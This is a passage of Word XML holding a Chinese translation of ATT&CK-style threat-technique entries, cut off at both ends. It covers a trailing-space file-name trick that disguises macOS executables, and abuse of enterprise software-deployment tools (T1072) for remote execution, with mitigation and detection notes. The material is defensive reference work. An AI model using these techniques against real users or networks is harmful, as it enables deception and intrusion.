              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="567A09B1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22D2B6E6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>攻</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82704">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>击者通过改变文件后缀来隐藏程序真实的文件类型。某些文件类型（尤其是不适用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82704">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82704">
        <w:t>app</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82704">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结尾），在文件名尾部增加空格会改变操作系统如何处理。例如，假设有个名为</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82704">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82704">
        <w:t>vil.bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82704">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82704">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82704">
        <w:t>ach-O</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82704">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可执行文件，当用户双击时，会启动</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82704">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82704">
        <w:t>erminal.app</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82704">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来执行。如果这个文件被重命名成</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82704">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82704">
        <w:t>vil.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82704">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这时当用户双击时，变会启动默认的文本编辑程序（不是运行二进制文件）。但如果文件命名成</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82704">
        <w:t>”evil.txt ”</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82704">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（注意尾部空格），此时用户双击程序，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82704">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82704">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会检测真实的文件类型，合理地处置，然后执行二进制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BF691A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="322FD23A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者使用这个特性来诱骗用户双击看似没有任何格式问题的文件，最终执行了某些恶意行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA0D55B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0825FF8B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为基于滥用系统特性，这类攻击技术很难通过预防控制措施进行缓解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C93829" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B82704" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267C4D5F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="0084576B" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件末尾通常不包含空格，因此很容易通过文件监控检查出来。但从用户的角度来看，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t>inder.app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>Terminal.app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行里很难观察出来。包含非标准后缀的二进制文件启动的进程通常是可疑的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B0EC23" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>第三方</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>软件</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="7A5725C8" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="635FBE26" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1072</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B0EA3ED" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，横向移动</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BB3990F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2403A5E6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B002D0A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，第三方应用日志，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>注册表，进程监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>使用，二进制文件元数据</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10CCB339" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>是否支持远程：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18045C57" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C5161FD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59291C52" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三方应用和软件部署系统可在网络环境中用于管理目的（例如，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SCCM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VNC</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HBSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Altiris</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等）。如果攻击者获得</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>这些系统的访问权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那么他们就可以执行代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193067E8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问并使用安装在企业网络的第三方应用部署系统。通过访问网络范围或企业范围的软件部署系统，攻击者可以在连接到软件部署系统的所有其它系统上执行远程代码。访问可用于横向移动到系统、收集信息或引起特定效果，例如擦除所有端点上的硬盘驱动器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710EFB42" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此操作所需的权限因系统配置而异；本地凭据可能足以直接访问部署服务器，或者可能需要特定的域凭据。但是，系统可能需要管理账号才能登录或执行软件部署。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C9F3DB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="7331"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="39B100A2" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6C9D1383" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="61028B90" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="548ECA15" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56722137" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>活动目录</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73711711" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>关键</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>系统使用组策略</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来确保系统和访问准确隔离。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="59200936" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04EB587B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>多因子</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>认证</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53AE19C9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>关键</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>系统使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>多因子认证来确保系统和访问准确隔离。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="0E79F454" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D0E4A9D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>网络分区</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68513563" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>关键</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>系统使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防火墙来确保系统准确隔离。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="1F7C9928" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="779EFA6D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>密码策略</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28FA257B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>验证用于访问部署系统的账号凭据。</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>确保</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>其唯一性并且</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>不会</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用于</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>整个企业网络。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="053833A0" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A0C5339" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特权账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15E17452" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>仅向有限数量的授权的管理员授予应用部署系统的访问权限。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="0D57C39C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58213FB0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
